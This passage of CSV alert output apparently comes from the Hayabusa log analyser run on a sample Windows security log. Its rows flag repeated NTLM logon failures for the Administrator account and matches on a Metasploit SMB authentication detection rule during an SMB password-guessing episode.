Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
